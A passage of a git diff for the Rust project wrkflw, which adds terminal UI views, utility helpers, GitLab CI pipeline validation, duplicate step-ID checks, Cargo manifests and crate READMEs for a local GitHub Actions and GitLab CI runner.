}
|
||||
};
|
||||
|
||||
status_items.push(Span::raw(" "));
|
||||
status_items.push(Span::styled(
|
||||
if is_docker_available {
|
||||
" Docker: Connected "
|
||||
} else {
|
||||
" Docker: Not Available "
|
||||
},
|
||||
Style::default()
|
||||
.bg(if is_docker_available {
|
||||
Color::Green
|
||||
} else {
|
||||
Color::Red
|
||||
})
|
||||
.fg(Color::White),
|
||||
));
|
||||
}
|
||||
RuntimeType::Podman => {
|
||||
// Check Podman silently using safe FD redirection
|
||||
let is_podman_available = match wrkflw_utils::fd::with_stderr_to_null(
|
||||
wrkflw_executor::podman::is_available,
|
||||
) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Podman availability.",
|
||||
);
|
||||
false
|
||||
}
|
||||
};
|
||||
|
||||
status_items.push(Span::raw(" "));
|
||||
status_items.push(Span::styled(
|
||||
if is_podman_available {
|
||||
" Podman: Connected "
|
||||
} else {
|
||||
" Podman: Not Available "
|
||||
},
|
||||
Style::default()
|
||||
.bg(if is_podman_available {
|
||||
Color::Green
|
||||
} else {
|
||||
Color::Red
|
||||
})
|
||||
.fg(Color::White),
|
||||
));
|
||||
}
|
||||
RuntimeType::SecureEmulation => {
|
||||
status_items.push(Span::styled(
|
||||
" 🔒SECURE ",
|
||||
Style::default().bg(Color::Green).fg(Color::White),
|
||||
));
|
||||
}
|
||||
RuntimeType::Emulation => {
|
||||
// No need to check anything for emulation mode
|
||||
}
|
||||
}
|
||||
|
||||
// Add validation/execution mode
|
||||
status_items.push(Span::raw(" "));
|
||||
status_items.push(Span::styled(
|
||||
format!(
|
||||
" {} ",
|
||||
if app.validation_mode {
|
||||
"Validation"
|
||||
} else {
|
||||
"Execution"
|
||||
}
|
||||
),
|
||||
Style::default()
|
||||
.bg(if app.validation_mode {
|
||||
Color::Yellow
|
||||
} else {
|
||||
Color::Green
|
||||
})
|
||||
.fg(Color::Black),
|
||||
));
|
||||
|
||||
// Add context-specific help based on current tab
|
||||
status_items.push(Span::raw(" "));
|
||||
let help_text = match app.selected_tab {
|
||||
0 => {
|
||||
if let Some(idx) = app.workflow_list_state.selected() {
|
||||
if idx < app.workflows.len() {
|
||||
let workflow = &app.workflows[idx];
|
||||
match workflow.status {
|
||||
crate::models::WorkflowStatus::NotStarted => "[Space] Toggle selection [Enter] Run selected [r] Run all selected [t] Trigger Workflow [Shift+R] Reset workflow",
|
||||
crate::models::WorkflowStatus::Running => "[Space] Toggle selection [Enter] Run selected [r] Run all selected (Workflow running...)",
|
||||
crate::models::WorkflowStatus::Success | crate::models::WorkflowStatus::Failed | crate::models::WorkflowStatus::Skipped => "[Space] Toggle selection [Enter] Run selected [r] Run all selected [Shift+R] Reset workflow",
|
||||
}
|
||||
} else {
|
||||
"[Space] Toggle selection [Enter] Run selected [r] Run all selected"
|
||||
}
|
||||
} else {
|
||||
"[Space] Toggle selection [Enter] Run selected [r] Run all selected"
|
||||
}
|
||||
}
|
||||
1 => {
|
||||
if app.detailed_view {
|
||||
"[Esc] Back to jobs [↑/↓] Navigate steps"
|
||||
} else {
|
||||
"[Enter] View details [↑/↓] Navigate jobs"
|
||||
}
|
||||
}
|
||||
2 => {
|
||||
// For logs tab, show scrolling instructions
|
||||
let log_count = app.logs.len() + wrkflw_logging::get_logs().len();
|
||||
if log_count > 0 {
|
||||
// Convert to a static string for consistent return type
|
||||
let scroll_text = format!(
|
||||
"[↑/↓] Scroll logs ({}/{}) [s] Search [f] Filter",
|
||||
app.log_scroll + 1,
|
||||
log_count
|
||||
);
|
||||
Box::leak(scroll_text.into_boxed_str())
|
||||
} else {
|
||||
"[No logs to display]"
|
||||
}
|
||||
}
|
||||
3 => "[↑/↓] Scroll help [?] Toggle help overlay",
|
||||
_ => "",
|
||||
};
|
||||
status_items.push(Span::styled(
|
||||
format!(" {} ", help_text),
|
||||
Style::default().fg(Color::White),
|
||||
));
|
||||
|
||||
// Show keybindings for common actions
|
||||
status_items.push(Span::raw(" "));
|
||||
status_items.push(Span::styled(
|
||||
" [Tab] Switch tabs ",
|
||||
Style::default().fg(Color::White),
|
||||
));
|
||||
status_items.push(Span::styled(
|
||||
" [?] Help ",
|
||||
Style::default().fg(Color::White),
|
||||
));
|
||||
status_items.push(Span::styled(
|
||||
" [q] Quit ",
|
||||
Style::default().fg(Color::White),
|
||||
));
|
||||
|
||||
let status_bar = Paragraph::new(Line::from(status_items))
|
||||
.style(Style::default().bg(Color::DarkGray))
|
||||
.alignment(Alignment::Left);
|
||||
|
||||
f.render_widget(status_bar, area);
|
||||
}
|
||||
74
crates/ui/src/views/title_bar.rs
Normal file
74
crates/ui/src/views/title_bar.rs
Normal file
@@ -0,0 +1,74 @@
|
||||
// Title bar rendering
|
||||
use crate::app::App;
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::{Alignment, Rect},
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Block, BorderType, Borders, Tabs},
|
||||
Frame,
|
||||
};
|
||||
use std::io;
|
||||
|
||||
// Render the title bar with tabs
|
||||
pub fn render_title_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, area: Rect) {
|
||||
let titles = ["Workflows", "Execution", "Logs", "Help"];
|
||||
let tabs = Tabs::new(
|
||||
titles
|
||||
.iter()
|
||||
.enumerate()
|
||||
.map(|(i, t)| {
|
||||
if i == 1 {
|
||||
// Special case for "Execution"
|
||||
let e_part = &t[0..1]; // "E"
|
||||
let x_part = &t[1..2]; // "x"
|
||||
let rest = &t[2..]; // "ecution"
|
||||
Line::from(vec![
|
||||
Span::styled(e_part, Style::default().fg(Color::White)),
|
||||
Span::styled(
|
||||
x_part,
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::UNDERLINED),
|
||||
),
|
||||
Span::styled(rest, Style::default().fg(Color::White)),
|
||||
])
|
||||
} else {
|
||||
// Original styling for other tabs
|
||||
let (first, rest) = t.split_at(1);
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
first,
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::UNDERLINED),
|
||||
),
|
||||
Span::styled(rest, Style::default().fg(Color::White)),
|
||||
])
|
||||
}
|
||||
})
|
||||
.collect(),
|
||||
)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" wrkflw ",
|
||||
Style::default()
|
||||
.fg(Color::Cyan)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
))
|
||||
.title_alignment(Alignment::Center),
|
||||
)
|
||||
.highlight_style(
|
||||
Style::default()
|
||||
.bg(Color::DarkGray)
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)
|
||||
.select(app.selected_tab)
|
||||
.divider(Span::raw("|"));
|
||||
|
||||
f.render_widget(tabs, area);
|
||||
}
|
||||
131
crates/ui/src/views/workflows_tab.rs
Normal file
131
crates/ui/src/views/workflows_tab.rs
Normal file
@@ -0,0 +1,131 @@
|
||||
// Workflows tab rendering
|
||||
use crate::app::App;
|
||||
use crate::models::WorkflowStatus;
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::{Alignment, Constraint, Direction, Layout, Rect},
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Block, BorderType, Borders, Cell, Paragraph, Row, Table, TableState},
|
||||
Frame,
|
||||
};
|
||||
use std::io;
|
||||
|
||||
// Render the workflow list tab
|
||||
pub fn render_workflows_tab(
|
||||
f: &mut Frame<CrosstermBackend<io::Stdout>>,
|
||||
app: &mut App,
|
||||
area: Rect,
|
||||
) {
|
||||
// Create a more structured layout for the workflow tab
|
||||
let chunks = Layout::default()
|
||||
.direction(Direction::Vertical)
|
||||
.constraints(
|
||||
[
|
||||
Constraint::Length(3), // Header with instructions
|
||||
Constraint::Min(5), // Workflow list
|
||||
]
|
||||
.as_ref(),
|
||||
)
|
||||
.margin(1)
|
||||
.split(area);
|
||||
|
||||
// Render header with instructions
|
||||
let header_text = vec![
|
||||
Line::from(vec![Span::styled(
|
||||
"Available Workflows",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)]),
|
||||
Line::from(vec![
|
||||
Span::styled("Space", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Toggle selection "),
|
||||
Span::styled("Enter", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Run "),
|
||||
Span::styled("t", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Trigger remotely"),
|
||||
]),
|
||||
];
|
||||
|
||||
let header = Paragraph::new(header_text)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded),
|
||||
)
|
||||
.alignment(Alignment::Center);
|
||||
|
||||
f.render_widget(header, chunks[0]);
|
||||
|
||||
// Create a table for workflows instead of a list for better organization
|
||||
let selected_style = Style::default()
|
||||
.bg(Color::DarkGray)
|
||||
.add_modifier(Modifier::BOLD);
|
||||
|
||||
// Normal style definition removed as it was unused
|
||||
|
||||
let header_cells = ["", "Status", "Workflow Name", "Path"]
|
||||
.iter()
|
||||
.map(|h| Cell::from(*h).style(Style::default().fg(Color::Yellow)));
|
||||
|
||||
let header = Row::new(header_cells)
|
||||
.style(Style::default().add_modifier(Modifier::BOLD))
|
||||
.height(1);
|
||||
|
||||
let rows = app.workflows.iter().map(|workflow| {
|
||||
// Create cells for each column
|
||||
let checkbox = if workflow.selected { "✓" } else { " " };
|
||||
|
||||
let (status_symbol, status_style) = match workflow.status {
|
||||
WorkflowStatus::NotStarted => ("○", Style::default().fg(Color::Gray)),
|
||||
WorkflowStatus::Running => ("⟳", Style::default().fg(Color::Cyan)),
|
||||
WorkflowStatus::Success => ("✅", Style::default().fg(Color::Green)),
|
||||
WorkflowStatus::Failed => ("❌", Style::default().fg(Color::Red)),
|
||||
WorkflowStatus::Skipped => ("⏭", Style::default().fg(Color::Yellow)),
|
||||
};
|
||||
|
||||
let path_display = workflow.path.to_string_lossy();
|
||||
let path_shortened = if path_display.len() > 30 {
|
||||
format!("...{}", &path_display[path_display.len() - 30..])
|
||||
} else {
|
||||
path_display.to_string()
|
||||
};
|
||||
|
||||
Row::new(vec![
|
||||
Cell::from(checkbox).style(Style::default().fg(Color::Green)),
|
||||
Cell::from(status_symbol).style(status_style),
|
||||
Cell::from(workflow.name.clone()),
|
||||
Cell::from(path_shortened).style(Style::default().fg(Color::DarkGray)),
|
||||
])
|
||||
});
|
||||
|
||||
let workflows_table = Table::new(rows)
|
||||
.header(header)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Workflows ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
)
|
||||
.highlight_style(selected_style)
|
||||
.highlight_symbol("» ")
|
||||
.widths(&[
|
||||
Constraint::Length(3), // Checkbox column
|
||||
Constraint::Length(4), // Status icon column
|
||||
Constraint::Percentage(45), // Name column
|
||||
Constraint::Percentage(45), // Path column
|
||||
]);
|
||||
|
||||
// We need to convert ListState to TableState
|
||||
let mut table_state = TableState::default();
|
||||
table_state.select(app.workflow_list_state.selected());
|
||||
|
||||
f.render_stateful_widget(workflows_table, chunks[1], &mut table_state);
|
||||
|
||||
// Update the app list state to match the table state
|
||||
app.workflow_list_state.select(table_state.selected());
|
||||
}
|
||||
20
crates/utils/Cargo.toml
Normal file
20
crates/utils/Cargo.toml
Normal file
@@ -0,0 +1,20 @@
|
||||
[package]
|
||||
name = "wrkflw-utils"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Utility functions for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
nix.workspace = true
|
||||
21
crates/utils/README.md
Normal file
21
crates/utils/README.md
Normal file
@@ -0,0 +1,21 @@
|
||||
## wrkflw-utils
|
||||
|
||||
Shared helpers used across crates.
|
||||
|
||||
- Workflow file detection (`.github/workflows/*.yml`, `.gitlab-ci.yml`)
|
||||
- File-descriptor redirection utilities for silencing noisy subprocess output
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use std::path::Path;
|
||||
use wrkflw_utils::{is_workflow_file, fd::with_stderr_to_null};
|
||||
|
||||
assert!(is_workflow_file(Path::new(".github/workflows/ci.yml")));
|
||||
|
||||
let value = with_stderr_to_null(|| {
|
||||
eprintln!("this is hidden");
|
||||
42
|
||||
}).unwrap();
|
||||
assert_eq!(value, 42);
|
||||
```
|
||||
@@ -1,6 +1,17 @@
|
||||
// utils crate
|
||||
|
||||
use std::path::Path;
|
||||
|
||||
pub fn is_workflow_file(path: &Path) -> bool {
|
||||
// First, check for GitLab CI files by name
|
||||
if let Some(file_name) = path.file_name() {
|
||||
let file_name_str = file_name.to_string_lossy().to_lowercase();
|
||||
if file_name_str == ".gitlab-ci.yml" || file_name_str.ends_with("gitlab-ci.yml") {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
|
||||
// Then check for GitHub Actions workflows
|
||||
if let Some(ext) = path.extension() {
|
||||
if ext == "yml" || ext == "yaml" {
|
||||
// Check if the file is in a .github/workflows directory
|
||||
@@ -47,7 +58,7 @@ pub mod fd {
|
||||
// Duplicate the current stderr fd
|
||||
let stderr_backup = match dup(STDERR_FILENO) {
|
||||
Ok(fd) => fd,
|
||||
Err(e) => return Err(io::Error::new(io::ErrorKind::Other, e)),
|
||||
Err(e) => return Err(io::Error::other(e)),
|
||||
};
|
||||
|
||||
// Open /dev/null
|
||||
@@ -55,7 +66,7 @@ pub mod fd {
|
||||
Ok(fd) => fd,
|
||||
Err(e) => {
|
||||
let _ = close(stderr_backup); // Clean up on error
|
||||
return Err(io::Error::new(io::ErrorKind::Other, e));
|
||||
return Err(io::Error::other(e));
|
||||
}
|
||||
};
|
||||
|
||||
@@ -63,7 +74,7 @@ pub mod fd {
|
||||
if let Err(e) = dup2(null_fd, STDERR_FILENO) {
|
||||
let _ = close(stderr_backup); // Clean up on error
|
||||
let _ = close(null_fd);
|
||||
return Err(io::Error::new(io::ErrorKind::Other, e));
|
||||
return Err(io::Error::other(e));
|
||||
}
|
||||
|
||||
Ok(RedirectedStderr {
|
||||
20
crates/validators/Cargo.toml
Normal file
20
crates/validators/Cargo.toml
Normal file
@@ -0,0 +1,20 @@
|
||||
[package]
|
||||
name = "wrkflw-validators"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Workflow validation functionality for wrkflw execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
29
crates/validators/README.md
Normal file
29
crates/validators/README.md
Normal file
@@ -0,0 +1,29 @@
|
||||
## wrkflw-validators
|
||||
|
||||
Validation utilities for workflows and steps.
|
||||
|
||||
- Validates GitHub Actions sections: jobs, steps, actions references, triggers
|
||||
- GitLab pipeline validation helpers
|
||||
- Matrix-specific validation
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use serde_yaml::Value;
|
||||
use wrkflw_models::ValidationResult;
|
||||
use wrkflw_validators::{validate_jobs, validate_triggers};
|
||||
|
||||
let yaml: Value = serde_yaml::from_str(r#"name: demo
|
||||
on: [workflow_dispatch]
|
||||
jobs: { build: { runs-on: ubuntu-latest, steps: [] } }
|
||||
"#).unwrap();
|
||||
|
||||
let mut res = ValidationResult::new();
|
||||
if let Some(on) = yaml.get("on") {
|
||||
validate_triggers(on, &mut res);
|
||||
}
|
||||
if let Some(jobs) = yaml.get("jobs") {
|
||||
validate_jobs(jobs, &mut res);
|
||||
}
|
||||
assert!(res.is_valid);
|
||||
```
|
||||
@@ -1,4 +1,4 @@
|
||||
use crate::models::ValidationResult;
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
pub fn validate_action_reference(
|
||||
action_ref: &str,
|
||||
234
crates/validators/src/gitlab.rs
Normal file
234
crates/validators/src/gitlab.rs
Normal file
@@ -0,0 +1,234 @@
|
||||
use std::collections::HashMap;
|
||||
use wrkflw_models::gitlab::{Job, Pipeline};
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
/// Validate a GitLab CI/CD pipeline
|
||||
pub fn validate_gitlab_pipeline(pipeline: &Pipeline) -> ValidationResult {
|
||||
let mut result = ValidationResult::new();
|
||||
|
||||
// Basic structure validation
|
||||
if pipeline.jobs.is_empty() {
|
||||
result.add_issue("Pipeline must contain at least one job".to_string());
|
||||
}
|
||||
|
||||
// Validate jobs
|
||||
validate_jobs(&pipeline.jobs, &mut result);
|
||||
|
||||
// Validate stages if defined
|
||||
if let Some(stages) = &pipeline.stages {
|
||||
validate_stages(stages, &pipeline.jobs, &mut result);
|
||||
}
|
||||
|
||||
// Validate dependencies
|
||||
validate_dependencies(&pipeline.jobs, &mut result);
|
||||
|
||||
// Validate extends
|
||||
validate_extends(&pipeline.jobs, &mut result);
|
||||
|
||||
// Validate artifacts
|
||||
validate_artifacts(&pipeline.jobs, &mut result);
|
||||
|
||||
result
|
||||
}
|
||||
|
||||
/// Validate GitLab CI/CD jobs
|
||||
fn validate_jobs(jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
|
||||
for (job_name, job) in jobs {
|
||||
// Skip template jobs
|
||||
if let Some(true) = job.template {
|
||||
continue;
|
||||
}
|
||||
|
||||
// Check for script or extends
|
||||
if job.script.is_none() && job.extends.is_none() {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' must have a script section or extend another job",
|
||||
job_name
|
||||
));
|
||||
}
|
||||
|
||||
// Check when value if present
|
||||
if let Some(when) = &job.when {
|
||||
match when.as_str() {
|
||||
"on_success" | "on_failure" | "always" | "manual" | "never" => {
|
||||
// Valid when value
|
||||
}
|
||||
_ => {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' has invalid 'when' value: '{}'. Valid values are: on_success, on_failure, always, manual, never",
|
||||
job_name, when
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check retry configuration
|
||||
if let Some(retry) = &job.retry {
|
||||
match retry {
|
||||
wrkflw_models::gitlab::Retry::MaxAttempts(attempts) => {
|
||||
if *attempts > 10 {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' has excessive retry count: {}. Consider reducing to avoid resource waste",
|
||||
job_name, attempts
|
||||
));
|
||||
}
|
||||
}
|
||||
wrkflw_models::gitlab::Retry::Detailed { max, when: _ } => {
|
||||
if *max > 10 {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' has excessive retry count: {}. Consider reducing to avoid resource waste",
|
||||
job_name, max
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Validate GitLab CI/CD stages
|
||||
fn validate_stages(stages: &[String], jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
|
||||
// Check that all jobs reference existing stages
|
||||
for (job_name, job) in jobs {
|
||||
if let Some(stage) = &job.stage {
|
||||
if !stages.contains(stage) {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' references undefined stage '{}'. Available stages are: {}",
|
||||
job_name,
|
||||
stage,
|
||||
stages.join(", ")
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check for unused stages
|
||||
for stage in stages {
|
||||
let used = jobs.values().any(|job| {
|
||||
if let Some(job_stage) = &job.stage {
|
||||
job_stage == stage
|
||||
} else {
|
||||
false
|
||||
}
|
||||
});
|
||||
|
||||
if !used {
|
||||
result.add_issue(format!(
|
||||
"Stage '{}' is defined but not used by any job",
|
||||
stage
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Validate GitLab CI/CD job dependencies
|
||||
fn validate_dependencies(jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
|
||||
for (job_name, job) in jobs {
|
||||
if let Some(dependencies) = &job.dependencies {
|
||||
for dependency in dependencies {
|
||||
if !jobs.contains_key(dependency) {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' depends on undefined job '{}'",
|
||||
job_name, dependency
|
||||
));
|
||||
} else if job_name == dependency {
|
||||
result.add_issue(format!("Job '{}' cannot depend on itself", job_name));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Validate GitLab CI/CD job extends
|
||||
fn validate_extends(jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
|
||||
// Check for circular extends
|
||||
for (job_name, job) in jobs {
|
||||
if let Some(extends) = &job.extends {
|
||||
// Check that all extended jobs exist
|
||||
for extend in extends {
|
||||
if !jobs.contains_key(extend) {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' extends undefined job '{}'",
|
||||
job_name, extend
|
||||
));
|
||||
continue;
|
||||
}
|
||||
|
||||
// Check for circular extends
|
||||
let mut visited = vec![job_name.clone()];
|
||||
check_circular_extends(extend, jobs, &mut visited, result);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Helper function to detect circular extends
|
||||
fn check_circular_extends(
|
||||
job_name: &str,
|
||||
jobs: &HashMap<String, Job>,
|
||||
visited: &mut Vec<String>,
|
||||
result: &mut ValidationResult,
|
||||
) {
|
||||
visited.push(job_name.to_string());
|
||||
|
||||
if let Some(job) = jobs.get(job_name) {
|
||||
if let Some(extends) = &job.extends {
|
||||
for extend in extends {
|
||||
if visited.contains(&extend.to_string()) {
|
||||
// Circular dependency detected
|
||||
let cycle = visited
|
||||
.iter()
|
||||
.skip(visited.iter().position(|x| x == extend).unwrap())
|
||||
.chain(std::iter::once(extend))
|
||||
.cloned()
|
||||
.collect::<Vec<_>>()
|
||||
.join(" -> ");
|
||||
|
||||
result.add_issue(format!("Circular extends detected: {}", cycle));
|
||||
return;
|
||||
}
|
||||
|
||||
check_circular_extends(extend, jobs, visited, result);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
visited.pop();
|
||||
}
|
||||
|
||||
/// Validate GitLab CI/CD job artifacts
|
||||
fn validate_artifacts(jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
|
||||
for (job_name, job) in jobs {
|
||||
if let Some(artifacts) = &job.artifacts {
|
||||
// Check that paths are specified
|
||||
if let Some(paths) = &artifacts.paths {
|
||||
if paths.is_empty() {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' has artifacts section with empty paths",
|
||||
job_name
|
||||
));
|
||||
}
|
||||
} else {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' has artifacts section without specifying paths",
|
||||
job_name
|
||||
));
|
||||
}
|
||||
|
||||
// Check for valid 'when' value if present
|
||||
if let Some(when) = &artifacts.when {
|
||||
match when.as_str() {
|
||||
"on_success" | "on_failure" | "always" => {
|
||||
// Valid when value
|
||||
}
|
||||
_ => {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' has artifacts with invalid 'when' value: '{}'. Valid values are: on_success, on_failure, always",
|
||||
job_name, when
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,6 +1,6 @@
|
||||
use crate::models::ValidationResult;
|
||||
use crate::validators::{validate_matrix, validate_steps};
|
||||
use crate::{validate_matrix, validate_steps};
|
||||
use serde_yaml::Value;
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
pub fn validate_jobs(jobs: &Value, result: &mut ValidationResult) {
|
||||
if let Value::Mapping(jobs_map) = jobs {
|
||||
@@ -1,10 +1,14 @@
|
||||
// validators crate
|
||||
|
||||
mod actions;
|
||||
mod gitlab;
|
||||
mod jobs;
|
||||
mod matrix;
|
||||
mod steps;
|
||||
mod triggers;
|
||||
|
||||
pub use actions::validate_action_reference;
|
||||
pub use gitlab::validate_gitlab_pipeline;
|
||||
pub use jobs::validate_jobs;
|
||||
pub use matrix::validate_matrix;
|
||||
pub use steps::validate_steps;
|
||||
@@ -1,5 +1,5 @@
|
||||
use crate::models::ValidationResult;
|
||||
use serde_yaml::Value;
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
pub fn validate_matrix(matrix: &Value, result: &mut ValidationResult) {
|
||||
// Check if matrix is a mapping
|
||||
@@ -1,8 +1,11 @@
|
||||
use crate::models::ValidationResult;
|
||||
use crate::validators::validate_action_reference;
|
||||
use crate::validate_action_reference;
|
||||
use serde_yaml::Value;
|
||||
use std::collections::HashSet;
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
pub fn validate_steps(steps: &[Value], job_name: &str, result: &mut ValidationResult) {
|
||||
let mut step_ids: HashSet<String> = HashSet::new();
|
||||
|
||||
for (i, step) in steps.iter().enumerate() {
|
||||
if let Some(step_map) = step.as_mapping() {
|
||||
if !step_map.contains_key(Value::String("name".to_string()))
|
||||
@@ -27,6 +30,18 @@ pub fn validate_steps(steps: &[Value], job_name: &str, result: &mut ValidationRe
|
||||
));
|
||||
}
|
||||
|
||||
// Check for duplicate step IDs
|
||||
if let Some(Value::String(id)) = step_map.get(Value::String("id".to_string())) {
|
||||
if !step_ids.insert(id.clone()) {
|
||||
result.add_issue(format!(
|
||||
"Job '{}', step {}: The identifier '{}' may not be used more than once within the same scope",
|
||||
job_name,
|
||||
i + 1,
|
||||
id
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
// Validate action reference if 'uses' is present
|
||||
if let Some(Value::String(uses)) = step_map.get(Value::String("uses".to_string())) {
|
||||
validate_action_reference(uses, job_name, i, result);
|
||||
@@ -1,5 +1,5 @@
|
||||
use crate::models::ValidationResult;
|
||||
use serde_yaml::Value;
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
pub fn validate_triggers(on: &Value, result: &mut ValidationResult) {
|
||||
let valid_events = vec![
|
||||
65
crates/wrkflw/Cargo.toml
Normal file
65
crates/wrkflw/Cargo.toml
Normal file
@@ -0,0 +1,65 @@
|
||||
[package]
|
||||
name = "wrkflw"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
license.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Workspace crates
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-executor = { path = "../executor", version = "0.7.0" }
|
||||
wrkflw-github = { path = "../github", version = "0.7.0" }
|
||||
wrkflw-gitlab = { path = "../gitlab", version = "0.7.0" }
|
||||
wrkflw-logging = { path = "../logging", version = "0.7.0" }
|
||||
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
|
||||
wrkflw-parser = { path = "../parser", version = "0.7.0" }
|
||||
wrkflw-runtime = { path = "../runtime", version = "0.7.0" }
|
||||
wrkflw-ui = { path = "../ui", version = "0.7.0" }
|
||||
wrkflw-utils = { path = "../utils", version = "0.7.0" }
|
||||
wrkflw-validators = { path = "../validators", version = "0.7.0" }
|
||||
wrkflw-evaluator = { path = "../evaluator", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
clap.workspace = true
|
||||
bollard.workspace = true
|
||||
tokio.workspace = true
|
||||
futures-util.workspace = true
|
||||
futures.workspace = true
|
||||
chrono.workspace = true
|
||||
uuid.workspace = true
|
||||
tempfile.workspace = true
|
||||
dirs.workspace = true
|
||||
thiserror.workspace = true
|
||||
log.workspace = true
|
||||
regex.workspace = true
|
||||
lazy_static.workspace = true
|
||||
reqwest.workspace = true
|
||||
libc.workspace = true
|
||||
nix.workspace = true
|
||||
urlencoding.workspace = true
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
serde_json.workspace = true
|
||||
colored.workspace = true
|
||||
indexmap.workspace = true
|
||||
rayon.workspace = true
|
||||
num_cpus.workspace = true
|
||||
itertools.workspace = true
|
||||
once_cell.workspace = true
|
||||
crossterm.workspace = true
|
||||
ratatui.workspace = true
|
||||
walkdir = "2.4"
|
||||
|
||||
[lib]
|
||||
name = "wrkflw_lib"
|
||||
path = "src/lib.rs"
|
||||
|
||||
[[bin]]
|
||||
name = "wrkflw"
|
||||
path = "src/main.rs"
|
||||
112
crates/wrkflw/README.md
Normal file
112
crates/wrkflw/README.md
Normal file
@@ -0,0 +1,112 @@
|
||||
## WRKFLW (CLI and Library)
|
||||
|
||||
This crate provides the `wrkflw` command-line interface and a thin library surface that ties together all WRKFLW subcrates. It lets you validate and execute GitHub Actions workflows and GitLab CI pipelines locally, with a built-in TUI for an interactive experience.
|
||||
|
||||
- **Validate**: Lints structure and common mistakes in workflow/pipeline files
|
||||
- **Run**: Executes jobs locally using Docker, Podman, or emulation (no containers)
|
||||
- **TUI**: Interactive terminal UI for browsing workflows, running, and viewing logs
|
||||
- **Trigger**: Manually trigger remote runs on GitHub/GitLab
|
||||
|
||||
### Installation
|
||||
|
||||
```bash
|
||||
cargo install wrkflw
|
||||
